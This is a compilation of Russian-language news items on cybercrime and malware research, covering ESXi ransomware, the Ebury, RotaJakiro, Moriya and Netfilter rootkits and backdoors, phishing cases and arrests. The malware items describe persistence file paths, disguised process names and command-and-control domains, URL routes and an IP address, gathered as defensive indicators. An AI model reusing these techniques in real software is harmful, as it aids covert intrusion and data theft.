«В настоящее время планируется запустить [эту функцию] в качестве эксперимента для небольшого процента пользователей в Chrome 89, и полноценно внедрить ее в Chrome 90, если все пойдет по плану», — рассказывает инженер по безопасности Chrome Эмили Старк (Emily Stark).
Click to expand...
Уже сейчас пользователи могут протестировать новый механизм в Chrome Canary. Для этого нужно включить функцию в chrome://flags/#omnibox-default-typed- navigations-to-https.
Источник: xakep.ru/2021/03/02/chrome-https/
Издание ZDNet предупреждает, что как минимум одна хак-группа использует уязвимости в VMWare ESXi для атак на виртуальные машины и последующего шифрования виртуальных дисков. Впервые такие атаки были замечены еще осенью прошлого года, и тогда их связывали с активностью операторов малвари RansomExx.
Сразу несколько ИБ-экспертов, с которыми говорили журналисты, полагают, что преступники злоупотребляют багами CVE-2019-5544 и CVE-2020-3992 обнаруженными в VMWare ESXi. Напомню, что это решение позволяет нескольким виртуальным машинам совместно использовать одно и то же хранилище жесткого диска.
Обе вышеупомянутые уязвимости связаны с протоколом SLP, который используется устройствами в одной сети для обнаружения друг друга. По сути, баги позволяют хакерам, находящимся в той же сети, отправлять вредоносные SLP-запросы на устройство ESXi и захватывать контроль над ним.
Так, операторы RansomExx получали доступ к устройству в корпоративной сети, а затем использовали его для дальнейших атак на локальные экземпляры ESXi и шифрования виртуальных жестких дисков, используемых для хранения данных с разных виртуальных машин. Подобные атаки могут спровоцировать настоящий хаос в компании, ведь виртуальные диски ESXi обычно используются для централизации данных из множества других систем.
Информация о таких инцидентах уже не раз появлялась на Reddit, в Twitter, а также об атаках упоминали специалисты на ИБ-конференциях.
__https://twitter.com/x/status/1324896051128635392
Сообщается, что такой трюк использует как минимум одна группировка, RansomExx (она же Defray777), однако в прошлом месяце авторы вымогателя Babuk Locker тоже упоминали похожие функции в своей малвари, хотя подтвержденных атак пока обнаружено не было.

Системным администраторам, использующим VMWare ESXi, рекомендуется установить патчи, либо вообще отключить поддержку SLP для предотвращения атак, если протокол не используется
Источник: xakep.ru/2021/02/03/esxi-ransomware/
Братья-близнецы из Украины и россиянин были арестованы полицией Индонезии в столице страны Джакарте. Они были сотрудниками наркошопа под названием Hydra Indonesia.

Аресты стали следствием масштабной операции, в ходе которой силовикам удалось обнаружить две нарколаборатории, занимавшиеся производством и продажей гидропоники и экстази, а также мефедрона. Известны имена русскоязычных преступников — химики Иван и Михаил Воловод, а также кладмен Константин Круц. При этом в розыск были объявлены еще двое граждан Украины, которых следствие считает организаторами производства.
Выйти на украинцев и россиянина удалось после ареста на Бали жителя Джакарты, который был пойман с шестью килограммами метамфетамина. Там он пытался затеряться после разгрома принадлежащей ему лаборатории. Вместо этого он стал ценным свидетелем, благодаря которому по цепочке удалось выйти на членов Hydra Indonesia. Теперь всем им, в соответствии с законодательством страны, грозит смертная казнь. В ходе арестов были изъяты 10 килограммов каннабиноидов, 684 грамма мефедрона и 107 граммов кокаина.
Представители этого наркошопа пытались продвигаться на форуме rutor[.] Владелец аккаунта просил оказать ему помощь в синтезе MDMA в бесплатных разделах химиков. Его последняя активность датирована ноябрем 2023 года.
news.detik.com/berita/d-7338920/polri-cekal-2-wn-ukraina-dpo-bos-lab-narkoba- rahasia-di-bali
Исследователи из компании ESET [опубликовали](https://www.welivesecurity.com/en/eset-research/ebury-alive- unseen-400k-linux-servers-compromised-cryptotheft-financial-gain/) 43-страничный [отчёт](https://web-assets.esetstatic.com/wls/en/papers/white- papers/ebury-is-alive-but-unseen.pdf) с анализом руткита Ebury и связанной с ним активности. Утверждается, что Ebury применяется с 2009 года и с тех пор был установлен на более чем 400 тысяч серверов под управлением Linux и несколько сотен систем на базе FreeBSD, OpenBSD и Solaris. Около 110 тысяч серверов оставались поражены Ebury по состоянию на конец 2023 года. Исследование представляет отдельный интерес с учётом того, что Ebury был задействован при атаке на kernel.org, что открывает некоторые новые подробности компрометации инфраструктуры разработки ядра Linux, выявленной в 2011 году. Ebury также был выявлен на серверах регистратора доменов, криптобиржах, выходных узлах Tor и у нескольких хостинг-провайдеров, имена которых не называются.
Изначально предполагалось, что атаковавшие серверы kernel.org злоумышленники оставались незамеченными 17 дней, но по данным ESET это время рассчитано с момента подстановки руткита Phalanx, а бэкдор Ebury находился на серверах с 2009 года и около двух лет мог использоваться для получения root-доступа к серверам. Вредоносное ПО Ebury и Phalanx установлено в рамках разных атак, не пересекающихся друг с другом и проводимых разными группами злоумышленников. Внедрение бэкдора Ebury затронуло как минимум 4 сервера в инфраструктуре kernel.org, два из которых были поражены приблизительно в течение двух лет, а остальные два - в течение 6 месяцев.
Атакующие получили доступ к хранящимся в /etc/shadow хэшам паролей 551 пользователя, среди которых были все мэйнтейнеры ядра (аккаунты использовались для доступа в Git; после инцидента пароли были заменены, а модель доступа была пересмотрена и переведена на использование цифровых подписей). Для 257 пользователей атакующим удалось определить пароли в открытом виде, предположительно путём подбора паролей по хэшам и через перехват вредоносным компонентом Ebury паролей, используемых в SSH.
Вредоносный компонент Ebury распространялся в виде разделяемой библиотеки, которая после установки перехватывала функции, используемые в OpenSSH, для организации удалённого подключения к системе c правами root. Атака была не целевой и, как и другие поражённые тысячи хостов, серверы kernel.org использовались как часть ботнета для рассылки спама, кражи учётных данных для распространения на других системах, перенаправления web-трафика и совершения другой вредоносной деятельности.
Для проникновения на серверы использовались неисправленные уязвимости в серверном ПО, например, уязвимости в хостинг-панелях, или перехваченные пароли (предполагается, что серверы kernel.org был взломаны в результате компрометации пароля одного из пользователей, имевшего shell-доступ). Для повышения привилегий использовались уязвимости, такие как Dirty COW.
Применяемые в последние годы новые версии Ebury кроме бэкдора включали в себя такие возможности, как модули к Apache httpd для проксирования трафика, перенаправления пользователей и перехвата конфиденциальной информации, модуль ядра для внесения изменений в транзитный HTTP-трафик, инструменты для скрытия собственного трафика от межсетевых экранов, скрипты для проведения AitM-атак (Adversary-in-the-Middle, двунаправленный MiTM) для перехвата учётных данных SSH в сетях хостинг-провайдеров.
Компания OpenAI работает с Министерством обороны США над несколькими проектами, один из которых касается разработки ИБ-решений с открытым исходным кодом. Об в интервью Bloomberg, проведенном на полях Всемирного экономического форума в Давосе, сообщила вице-президент OpenAI по глобальным вопросам Анна Маканджу (Anna Makanju).
Она отметила, что также проведены предварительные переговоры с Пентагоном о разработке с помощью ChatGPT методик помощи ветеранам боевых действий, находящимся на грани самоубийства. Именно с этим связано удаление из правил пользования чат-ботом фрагмента о недопустимости его применения при создании приложений, связанных с военными, на что ранее обратило внимание издание The Intercept.
Маканджу отметила, что OpenAI сохранит запрет на использование своих технологий для разработки оружия, уничтожения собственности или причинения вреда людям. Что любопытно, крупнейший инвестор компании, Microsoft, заключил несколько контрактов на создание программного обеспечения для американских военных. В частности, OpenAI, Anthropic, Google и Microsoft помогают Агентству перспективных исследований Министерства обороны США в рамках проекта AI Cyber Challenge разработать ПО, которое будет автоматически устранять уязвимости и защищать инфраструктуру от кибератак.
sc: bloomberg.com/news/articles/2024-01-16/openai-working-with-us-military-on- cybersecurity-tools-for-veterans
Власти Германии выдали ордер на арест российского хакера Николая Козачека (он же "blabla1234565" и "kazak"), обвиняемого в проведении кибератаки на аналитический центр НАТО. По словам немецких чиновников, в апреле 2017 года Козачек взломал ИТ-системы аналитического центра НАТО в земле Северного Рейна- Вестфалии, и установил кейлоггер X-Agent на компьютеры организации. Согласно заявлению следователей, хакер взломал как минимум две системы и получил доступ к внутренней информации НАТО.
Следователи связали 32-летнего гражданина России с APT28 (или Fancy Bear ). APT 28 ранее была связана с атакой на ИТ-систему немецкого Бундестага весной 2015 года.
В рамках расследования выяснилось, что целью атаки был не только натовский центр, но и еще около 1000 объектов. Также в расследовании фигурирует еще один россиянин – Дмитрий Бадин, по мнению Генпрокуратуры причастный к кибератаке на Бундестаг в 2015 году .
Они необходимы для противодействия кибератакам в полной мере.
Российские эксперты призвали усилить защиту российского киберпространства. Об
этом сообщает «Независимый общественный мониторинг».
Политолог Алексей Громский отметил, что подобные атаки направлены, в первую
очередь, из Германии и Украины.
«Планируются в специализированных подразделениях Североатлантического альянса
и рассматриваются как форма современных боевых действий. Полноценные
кибервойска руководство блока НАТО планирует запустить в 2023 году», –
приводит слова политолога «Независимый общественный мониторинг», - заявил
политолог.
Профессор МГУ Андрей Манойло также убежден в необходимости усиления
противодействия таким кибератакам. Он отметил, что должна быть возможность их
выявления еще на стадии подготовки. Если вмешательство уже началось —
пресекать контрмерами, проведением контропераций.
Исследовательская лаборатория 360 Netlab сообщила о выявлении нового вредоносного ПО для Linux, получившего кодовое имя RotaJakiro и включающего реализацию бэкдора, позволяющего управлять системой. Вредоносное ПО могло быть установлено атакующими после эксплуатации неисправленных уязвимостей в системе или подбора ненадёжных паролей.
Бэкдор был обнаружен в ходе анализа подозрительного трафика от одного из системных процессов, выявленного при разборе структуры ботнета, используемого для DDoS-атаки. До этого RotaJakiro оставался незамеченным на протяжении трёх лет, в частности, первые попытки проверки в сервисе VirusTotal файлов с MD5-хэшами, совпадающими с выявленным вредоносным ПО, датированы маем 2018 года.
Из особенностей RotaJakiro называется использование разных техник маскировки при запуске с правами непривилегированного пользователя и root. Для скрытия своего присутствия бэкдор использовал имена процессов systemd-daemon, session- dbus и gvfsd-helper, которые, с учётом нагромождения современных дистрибутивов Linux всевозможными служебными процессами, на первый взгляд казались легитимными и не вызывали подозрений.
При запуске с правами root для активации вредоносного ПО создавались скрипты /etc/init/systemd-agent.conf и /lib/systemd/system/sys-temd-agent.service, а сам вредоносный исполняемый файл размещался как /bin/systemd/systemd-daemon и /usr/lib/systemd/systemd-daemon (функциональность дублировалась в двух файлах). При выполнении с правами обычного пользователя использовался файл автозапуска $HOME/.config/au-tostart/gnomehelper.desktop и вносились изменения в .bashrc, а исполняемый файл сохранялся как $HOME/.gvfsd/.profile/gvfsd- helper и $HOME/.dbus/sessions/session-dbus. Одновременно запускались оба исполняемых файла, каждый из которых следил за наличием другого и восстанавливал его в случае завершения работы.
Для скрытия результатов своей деятельности в бэкдоре применялось несколько алгоритмов шифрования, например, для шифрования своих ресурсов использовался AES, а для скрытия канала связи с управляющим сервером связка из AES, XOR и ROTATE в сочетании со сжатием при помощи ZLIB.
Для получения управляющих команд вредоносное ПО обращалось к 4 доменам через сетевой порт 443 (в канале связи использовался свой протокол, а не HTTPS и TLS). Домены (cdn.mirror-codes.net, status.sublineover.net, blog.eduelects.com и news.thaprior.net) были зарегистрированы в 2015 году и размещены у киевского хостинг-провайдера Deltahost. В бэкдор были интегрированы 12 базовых функций, которые позволяли загружать и выполнять плагины с расширенной функциональностью, передавать данные об устройстве, перехватывать конфиденциальные данные и управлять локальными файлами.
• Source: https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/
• Source: https://www.virustotal.com/gui/file...c82dd34cd8f6a7423875921572e97ae1668b0/details
Работники киберполиции в Одесской области совместно со следователями полиции разоблачили хакера в распространении вредоносного программного обеспечения.
Кіберполіція установила, что 24-летний местный житель собственноручно разработал и распространял вредоносное программное обеспечение. Программа давала возможность удаленного взлома административных панелей вебресурсов. В результате фигурант получал имеющиеся в таких панелях сведения о пользователях, в том числе их персональные данные, банковские реквизиты, данные для входа в систему интернет-банкинга, аккаунтов соцсетей, электронных ящиков и тому подобное.
Хакер зашифровывал вредоносное программное обеспечение в документы в формате pdf и рассылал на электронные ящики пользователям почтовых сервисов. Для этого он выдавал себя за представителя службы безопасности сервисов. Свою разработку мужчина также продавал на хакерских форумах и в мессенджере.
В доме правонарушителя работники полиции провели санкционированный обыск. Изъяты мобильные телефоны и компьютерную технику. В ходе предварительного осмотра изъятой техники, кіберполіцейські обнаружили образцы вирусного программного обеспечения, около 15 миллионов дискредитированных логинов и паролей к различным системам интернет-банкинга, банковские реквизиты пользователей и списки авторизационных данных до вебпанелей.
Фигуранту объявлено о подозрении по ч. 1 ст. 361-1 (Создание с целью использования, распространения или сбыта вредных программных или технических средств, а также их распространение или сбыт) Уголовного кодекса Украины. Подозреваемому может грозить до двух лет лишения свободы.
Следствие продолжается.
Процессуальное руководство осуществляет Одесская местная прокуратура.
• Source: npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-odesita-u- stvorenni-ta-rozpovsyudzhenni-shkidlivogo-programnogo-zabezpechennya/
Участники этих группировок нанесли ущерб странам Европейского союза, Великобритании и США на сумму более 300 миллионов долларов.
Об этом шла речь во время рабочего совещания по подведению итогов работы Департамента киберполиции в 2020 году, передает пресс-центр МВД Украины.
Участие в совещании принял первый заместитель Главы Национальной полиции Украины Евгений Коваль и руководитель Департамента киберполиции Александр Гринчак.
Евгений Коваль отметил, что киберполиция прогрессирует и нарабатывает авторитет не только в рамках Национальной полиции, но и среди правоохранителей мира.
«Сегодня Департамент киберполиции – это высокий уровень не только подразделения, которое противодействует преступлениям в сфере высоких информационных технологий, но и подразделения криминальной полиции, которые готовы содействовать другим подразделениям полиции в противодействии преступности. Результат, заслуживающий отдельного внимания, - на протяжении прошлого года киберполицией, впервые за историю ее существования, задокументированы две преступные организации. Участники одной из них наладили каналы распространения психотропных вещевых с помощью интернета, участники другой – специализировались на взломе электронных систем путем брутфорса и сбывали продукты взлома в DarkNet», - сообщил первый заместитель председателя Нацполиции.
Александр Гринчак сообщил, что подразделение успешно работает в нескольких направлениях:
«Мы успешно раскрываем и предупреждаем преступления, связанные с онлайн- мошенничеством, кражами денег с банковских счетов граждан, распространением компьютерных вирусов, кражи хакерами конфиденциальной информации, онлайн- торговлей наркотиками. Мы противодействуем пиратству и распространению противоправного контента. Отдельное направление нашей работы - информирование населения о киберугрозах и предоставление им практических рекомендаций по кибергигиене».
Также руководитель киберполиции отметил, что одной из приоритетных задач подразделения является предоставление качественной помощи гражданам, пострадавшим от киберпреступников:
«Для этого в прошлом году мы запустили бесплатную телефонную линию поддержки. За 9 месяцев ее функционирования в киберполицию поступило более 100 тысяч звонков граждан. Кроме этого, более 40 тысяч обращений поступили по форме обратной связи».
Всего в прошлом году киберполиция провела 10 международных полицейских операций по разоблачению «хакерских» группировок, которые нанесли ущерб странам Европейского союза, Великобритании, США на сумму более 300 миллионов долларов.
В течение 2020 года было задержано 326 человек онлайн-мошенников, которые обманули более 26 тысяч граждан. Потерпевшим обеспечено возмещение почти 190 миллионов гривен. Благодаря усилиям правоохранителей в 2020 спасено 47 детей и арестовано 13 человек, причастных к созданию и распространению порнографического контента с участием детей. Пресечено 62 факта нарушения интеллектуальных прав.
В Гродненской области 115 человек привлечены к ответственности за совершение преступлений в IT-сфере. Об этом сообщили в отделении информации и общественных связей УВД Гродненского облисполкома.
"С начала года на территории Гродненской области зафиксировано около 1100 киберпреступлений, что на 400 меньше по сравнению с аналогичным периодом 2020 года. Таким образом, уменьшается статистический прирост преступлений - это результат широкомасштабной профилактической работы и повышения уровня подготовки правоохранителей, задействованных в сфере высоких технологий. 115 человек привлечены к ответственности за совершение противоправных действий в IT-сфере, преимущественно те, кто совершил серию преступлений на территории Принеманского региона", - рассказали в УВД.
Как отметил временно исполняющий обязанности начальника управления по противодействию киберпреступности УВД Гродненского облисполкома Андрей Прискока, сейчас на территории области продолжают фиксироваться факты хищения денежных средств с банковских карт. "Здесь можно разделить все на два больших блока: это кража самих банковских карт с последующим снятием денег и хищение средств с карт-счетов с помощью компьютерной техники. Преступления первого вида составляют не более 2% и в подавляющем большинстве раскрываются. Со вторым блоком все сложнее: вишинг и фишинг - похожие слова, но с разными значениями и сутью. Вишинг - метод, когда злоумышленник, используя телефонную связь и мессенджеры, представляется в большинстве своем сотрудником банка. Различными способами он выведывает конфиденциальные данные карты или аккаунта в банкинге потенциальной жертвы. Далее происходит хищение денежных средств", - рассказал он.
Последний пример был в Гродно, когда интернет-злоумышленники уговорили пенсионера взять кредит, а позже похитили деньги. В конце июля в мессенджере Viber с иностранного номера жителю Гродно позвонила ранее неизвестная ему женщина, представилась сотрудником банка и сообщила, что с карт-счета неизвестные пытаются снять денежные средства. Далее по просьбе неизвестной мужчина установил на свой мобильный телефон программу удаленного доступа AnyDesk. Также неизвестная женщина сообщила, что ему необходимо оформить на свое имя кредит для того, чтобы вычислить злоумышленников, что он и сделал. Мужчина оформил кредит на сумму Br14 тыс. и перевел данные денежные средства на свою пенсионную банковскую карту. Чуть позже мужчина обнаружил в мобильном телефоне СМС-сообщение с информацией о списании всех денежных средств.
Метод фишинга отличается тем, что здесь исключается фактор телефонного звонка, а используются ссылки на вредоносные интернет-ресурсы, которые внешне схожи с сайтами известных компаний и сервисов. Как правило, на этих ресурсах сообщается, что вы выиграли крупный приз, либо предлагают товар по нереально выгодной цене. Но для того, чтобы получить обещанное, необходимо ввести конфиденциальные данные карт, которые ни в коем случае нельзя сообщать. К сожалению, граждане сообщают и становятся жертвами злоумышленников.
Подразделениями по противодействию киберпреступности проводится широкомасштабная профилактическая работа с гражданами, регулярно повышается квалификация сотрудников, подбираются перспективные и профессиональные кадры. Поэтому как результат - раскрытые преступления: 115 человек привлечены к ответственности за совершение серии противоправных действий в IT-сфере.
Издание Bleeping Computer рассказало об интересном сервисе TheOldNet, который позволяет просматривать архивные версии сайтов, датированные 1996- 2012 годами, и погрузиться в атмосферу интернета 90-х.
Бесплатный прокси-сервис берет архивные копии любых сайтов (за указанный год и текущий месяц) с Archive.org, а затем отображает их в браузере. К примеру, на скриншоте ниже показано, как будет выглядеть Yahoo.com или Apple.com после настройки этого прокси.


Воспользоваться TheOldNet очень просто: достаточно настроить браузер на использование прокси. В зависимости от браузера это может быть выполнено как в настройках самого браузера, так и через настройки ОС. Так, в случае Chrome и Windows 10 нужно ввести «theoldnet.com» в поле адреса, задать номер порта между 1996 и 2012 (это год, который вы хотите увидеть), а также добавить в исключения web.archive.org.

Источник: xakep.ru/2021/04/13/theoldnet/
Мошенники представлялись членами семей своих жертв и убеждали их отправить деньги, якобы для срочной помощи.
Задержанные — мужчины и женщины в возрасте от 20 до 60 лет — были арестованы в период с февраля по апрель в 7 провинциях Испании. Все обвиняются в мошенничестве, отмывании денег и участии в преступной организации.
Схема мошенничества заключалась в том, что злоумышленники через WhatsApp связывались с жертвами, выдавая себя за их родственников, например, за сына, оказавшегося в критической ситуации и нуждающегося в срочной финансовой помощи. Переводы денег от 238 пострадавших колебались от €800 до €55 000. В большинстве случаев мошенникам удавалось получить от жертвы несколько платежей.
Полиция также выявила более 500 банковских счетов, использованных для перевода средств, а также почти 100 телефонных номеров, зарегистрированных на поддельные личности.
Отметим, что полиция Японии внедрила необычный метод борьбы с мошенничеством, нацеленным на пожилых людей. В магазинах префектуры Фукуи теперь можно найти поддельные платёжные карты, предназначенные для предупреждения жертв онлайн- мошенничеств.
sc: guardiacivil.es/es/prensa/noticias/8927.html
Прокуратура Могилевской области направила в суд дело минчанина, который через фишинговые страницы похитил Br78 тыс. и обманул более 110 человек. Об этом сообщили в службе информации регионального ведомства.
Прокуратура Могилевской области направила в суд уголовное дело по обвинению 21-летнего жителя Минска в хищении путем модификации компьютерной информации в особо крупном размере. От его противоправных действий пострадали 112 держателей банковских карт двух крупных банков.
Преступная схема заключалась в размещении в интернете так называемых фишинговых сайтов банков, визуально схожих с реальными сайтами этих учреждений. В частности, потерпевшие с ноября по декабрь 2021 года для проведения операций со средствами на своих текущих (расчетных) счетах в банках переходили по фишинговым ссылкам на предложенные им сайты.
Полагая, что процесс авторизации происходил на официальных ресурсах, и не сравнивая наименование страницы с реальным интернет-адресом, граждане предоставляли реквизиты доступа к своим счетам. Использовались такие конфиденциальные данные пользователей, как логин, пароль, сеансовый ключ, дополнительный пароль при двукратной идентификации, одноразовый СМС-код, предназначенные для входа в личный кабинет, в том числе в интернет-банкинге. После этого со счетов потерпевших деньги переводились на счета, к которым у обвиняемого имелись банковские карты.
По мере поступления средств минчанин обналичивал их в банкоматах столицы, рассчитывался в безналичном порядке за товары и услуги в торговых объектах. Лично и с участием неосведомленных о хищениях лиц переводил деньги на их банковские счета. Фактически минчанин противоправно завладел и распорядился чужими средствами в сумме свыше Br78 тыс.
Кроме того, обвиняемый совершил покушение на завладение более Br31 тыс. Проведение данных операций блокировали банковские учреждения из-за превышения установленного суточного лимита на лицевых счетах. Для утаивания происхождения и движения похищенных средств он имитировал деятельность в сфере оборота криптовалюты.
После изучения материалов дела в прокуратуре Могилевской области пришли к выводу об обоснованности предъявленного обвинения, относимости, допустимости и достаточности собранных доказательств.
Избранную ранее в отношении обвиняемого меру пресечения прокурор оставил прежней - заключение под стражу.
«Лаборатория Касперского» обнаружила кампанию кибершпионажа TunnelSnake, которая проводится с 2019 года и направлена на дипломатические представительства в Азии и Африке. В ней применяется ранее неизвестный руткит. Зловред, названный Moriya, позволяет совершать практически любые действия в операционной системе, проникать в сетевой трафик и маскировать вредоносные команды, отправляемые на заражённые устройства. С помощью Moriya злоумышленники несколько месяцев тайно контролировали сети жертв.
Руткиты — это вредоносные программы или наборы программных инструментов, которые дают атакующим практически неограниченный и тайный доступ к заражённому компьютеру. Эти зловреды известны своим умением скрываться благодаря способности проникать в саму структуру операционной системы. Microsoft разрабатывает меры, которые затрудняют успешное развёртывание и работу руткитов, особенно в ядре, и теперь большинство руткитов под Windows используются в сложных целевых атаках, таких как TunnelSnake.
Эксперты «Лаборатории Касперского» начали расследование, когда получили от защитных продуктов уведомления об обнаружении уникального руткита внутри сетей компаний-жертв. Он умеет скрываться особенно хорошо благодаря двум особенностям.
Во-первых, руткит проникает в сетевые пакеты и проверяет их из пространства адресов ядра Windows — той области памяти, где обычно работает только привилегированный и доверенный код. Это позволяло зловреду отправлять уникальные вредоносные пакеты до их обработки сетевым стеком операционной системы и, как следствие, избегать детектирования защитными решениями. Во- вторых, руткиту не приходилось обращаться к серверу за командами, как это обычно происходит с бэкдорами. Он получал команды в специально промаркированных пакетах, которые приходили в общем потоке сетевого трафика. Это значит, что злоумышленникам не требовалось создавать и поддерживать командно-контрольную инфраструктуру. Кроме того, это позволяло им тщательно скрывать следы присутствия в системе.
В большинстве случаев руткит разворачивался путём компрометации уязвимых веб- серверов внутри сетей компаний-жертв. В одном случае атакующие заразили сервер веб-оболочкой China Chopper. Это вредоносный код, который позволяет удалённо контролировать заражённый сервер.
Кроме руткита Moriya злоумышленники использовали и другие инструменты — новые кастомизированные или ранее использованные китайскоговорящими APT-группами. С их помощью атакующие сканировали устройства в локальной сети, находили новые цели и распространяли вредоносное ПО.
«Мы не знаем, кто именно стоит за этой атакой, но, судя по целям и инструментам, это может быть одна из известных китайскоговорящих групп. Мы также нашли более старую версию Moriya, использовавшуюся в отдельной атаке 2018 года. Значит, группа, которая стоит за этой кампанией, активна как минимум с того времени. Выбор целей и инструментов позволяет предположить, что её цель— шпионаж. Это нельзя утверждать наверняка, так как точно не известно, к какой именно информации злоумышленники получили доступ, — рассказал Сергей Новиков, заместитель руководителя глобального центра исследований и анализа угроз „Лаборатории Касперского“. — Мы продолжаем совершенствовать способы противодействия целевым атакам, но и злоумышленники совершенствуют свои стратегии. Мы видим всё больше таких кампаний, как TunnelSnake, в которых злоумышленники делают всё возможное, чтобы как можно дольше оставаться незаметными, инвестируют в наборы инструментов, которые становятся более кастомизированными, сложными и незаметными. Но, как показывает наше расследование, такие инструменты можно обнаружить и заблокировать. Гонка вендоров и злоумышленников продолжается. Чтобы выйти из неё победителем, сообщество экспертов по кибербезопасности должно объединять усилия».
Наладили функционирование мошеннического центра двое криминальных авторитетов. В поле зрения мошенников попадали граждане, которые сейчас вынужденно проживают за границей.
Обезвредили деятельность еще одного мошеннического колл-центра с миллионными оборотами оперативники управления стратегических расследований в Днепропетровской области Нацполиции совместно с коллегами-правоохранителями. Организовал «бизнес» так называемый «смотрящий» за левым берегом г. Днепра. К своей деятельности 42-летний мужчина привлек еще одного «криминального авторитета», который отвечал за вывод средств из-за границы и обналичивание их.
Представляясь сотрудниками службы безопасности банковских учреждений и используя психологические приемы, операторы колл-центра получали данные лиц о банковских картах и счетах. В дальнейшем члены группы присваивали средства граждан Украины, которые вынуждены были выехать за границу в связи с полномасштабным вторжением РФ.
Деньги переводились на электронные кошельки и банковские карты дропов (люди, которые согласились, чтобы их банковские карты стали «транзитными» для украденных мошенниками денег). В дальнейшем средства выводились в наличные через конвертационный центр в Днепре.
27 сентября полицейские задержали в порядке ст. 208 Уголовного процессуального кодекса Украины 13 участников преступной организации мошенников. Также провели более 40 обысков в офисных помещениях, по адресам проживания и в транспортных средствах фигурантов. Изъяли мобильные телефоны, сим-карты, компьютерную технику, «черновые» записи, оружие, почти 2 млн грн в разных валютах, автомобили.
Так называемому «смотрящему», его доверенному лицу - «криминальному авторитету» и 11 сообщникам сообщено подозрение по ч. 4 ст. 28, ч. 4 ст. 190 (мошенничество), ч. 1 и 2 ст. 255 (Создание, руководство преступным сообществом или преступной организацией, а также участие в нем) Уголовного кодекса Украины. Решается вопрос об избрании подозреваемым мер пресечения.
Досудебное расследование в уголовном производстве осуществляет ТУ ГБР, расположенное в городе Полтава, при процессуальном руководстве Днепропетровской областной прокуратуры.
Трой Хант, создатель и оператор известного агрегатора утечек Have I Been Pwned (HIBP) сообщает, что отныне ФБР будет напрямую загружать скомпрометированные пароли в базу сервиса, которая уже содержит более 613 000 000 паролей.
Так, если ФБР обнаруживает во время своих расследований скомпрометированные пароли, они загружаются в раздел Pwned Passwords. Правоохранители буду предоставлять пароли в виде хэшей SHA-1 и NTLM, а не открытым текстом. То есть личные данные пользователей никто видеть не будет.
Если основной сайт HIBP позволяет пользователям проверить, попадала ли их электронная почта, имя или username в какие-либо утечки данных, меньший раздел Pwned Passwords сообщает именно о компрометации паролей, причем без привязки пароля к какой-либо информации о пользователе.

Хотя большинству людей сайт HIBP знаком именно благодаря поиску по утекшим данных, раздел Pwned Passwords оказался даже более полезным и функциональным. Дело в том, что компонент Pwned Passwords, доступен как простой поиск, API и загружаемая БД. Он интегрирован в тысячи общедоступных и частных приложений, где используется для выявления слабых или ранее скомпрометированных паролей, и в случае обнаружения проблемы пользователя простят изменить учетные данные. К примеру, в настоящее время 17 стран мира применяют Pwned Passwords для проверки паролей госслужащих.
Однако до недавнего времени данные для Pwned Passwords Ханту предоставляли только ИБ-исследователи и анонимные информаторы. Теперь ФБР стало первым официальным источником, передающим данные для этого раздела HIBP.
Одновременно с заключением партнерства с ФБР Хант объявил и об открытии исходного кода Pwned Passwords. В своем блоге Хант пишет, что это чистое совпадение, и ФБР не требовало, чтобы он открывал исходники (эксперт планировал это с августа прошлого года). Теперь исходные коды доступны на GitHub и будут переданы .NET Foundation. Хант обещает, что исходники основной части Have I Been Pwned тоже будут открыты в скором будущем, как он и планировал.
Источник: xakep.ru/2021/05/28/hibp-fbi/
Компания Microsoft признала, что подписала вредоносный драйвер, который теперь распространяется в игровой среде. Драйвер под названием Netfilter на самом деле является руткитом, подключающимся к C&C-инфраструктуре с китайскими IP- адресами.
Специалист по вредоносному ПО компании G Data Карстен Хан (Karsten Hahn) обнаружил неладное на прошлой неделе, когда система оповещения о вредоносном ПО G Data обозначила Netfilter как вредоносную программу. Хан уведомил Microsoft о проблеме взялся за отслеживание и изучение драйвера.
Данный инцидент в очередной раз демонстрирует риски, связанные с недостаточным обеспечением безопасности цепочки поставок. На этот раз проблема связана с недочетами в используемом Microsoft процессе подписания кода.
Как пояснил исследователь, начиная с Windows Vista, в целях обеспечения стабильности работы системы, любой код, запущенный в режиме ядра, должен быть протестирован и подписан до публичного релиза. Драйверы без сертификата Microsoft по умолчанию устанавливаться не могут.
Как показывает анализ URL-адресов используемой Netfilter C&C-инфраструктуры, первый URL-адрес возвращает набор дополнительных маршрутов (URL), разделенных вертикальной чертой ("|"). Каждый из них играет свою роль:
URL-адрес, заканчивающийся на "/p", связан с настройками прокси-сервера;
"/s" обеспечивает закодированную переадресацию IP-адресов;
"/h?" предназначен для получения CPU-ID;
"/c" обеспечивает корневой сертификат;
"/v?" связан с функцией автоматического обновления вредоносного ПО.
Исследователь G Data провел тщательный анализ драйвера и пришел к выводу, что он является вредоносным. Хан проанализировал драйвер, его функции самообновления и индикаторы компрометации (IOC) и [изложил подробности в блоге](https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious- netfilter-rootkit).
Примечательно, что, согласно WHOIS, IP-адрес 110.42.4.180, к которому подключается Netfilter, принадлежит компании Ningbo Zhuo Zhi Innovation Network Technology.
В настоящее время Microsoft проводит тщательное расследование инцидента. Свидетельств того, что кто-то похитил ее сертификат для подписи кода, пока не обнаружено. Похоже, злоумышленник воспользовался процессом Microsoft по отправке драйверов и сумел легитимным образом получить подписанный Microsoft двоичный файл через программу Windows Hardware Compatibility Program.
Microsoft [приостановила](https://msrc- blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/) действие учетной записи злоумышленника и проверила все отправленные им материалы на предмет наличия в них признаков вредоносного ПО.
По данным компании, с помощью драйвера злоумышленник в основном нацеливался на игровой сектор, особенно в Китае, и пока нет никаких свидетельств того, что были затронуты корпоративные среды. Microsoft пока воздерживается от приписывания этого инцидента правительству какой-либо страны.
Злоумышленники похитили 2 млн евро у одних только немцев, а общие потери могут исчисляться сотнями миллионов.
Полиция произвела 15 арестов, допросила более 260 человек, провела обыски в четырех колл-центрах и более чем в дюжине жилых домов. Как выяснилось в ходе расследования, злоумышленники работали на территории Германии, Сербии, Болгарии и Кипра.
Правоохранительные органы изъяли три аппаратных кошелька с криптовалютой на сумму более $1 млн и более 50 000 евро наличными, а также три автомобиля, различное электронное оборудование, резервные копии данных и документы.
В заявлении Европола сказано, что подозреваемые рекламировали себя в социальных сетях, чтобы заманить жертв на криптоинвестиционные сайты, управляемые их подельниками. Сначала жертвы (в основном ими были немцы) вкладывали небольшие трехзначные суммы, а потом велись на фальшивые скачки цен и уговоры злоумышленников, убеждавших “вложить” еще больше денег.
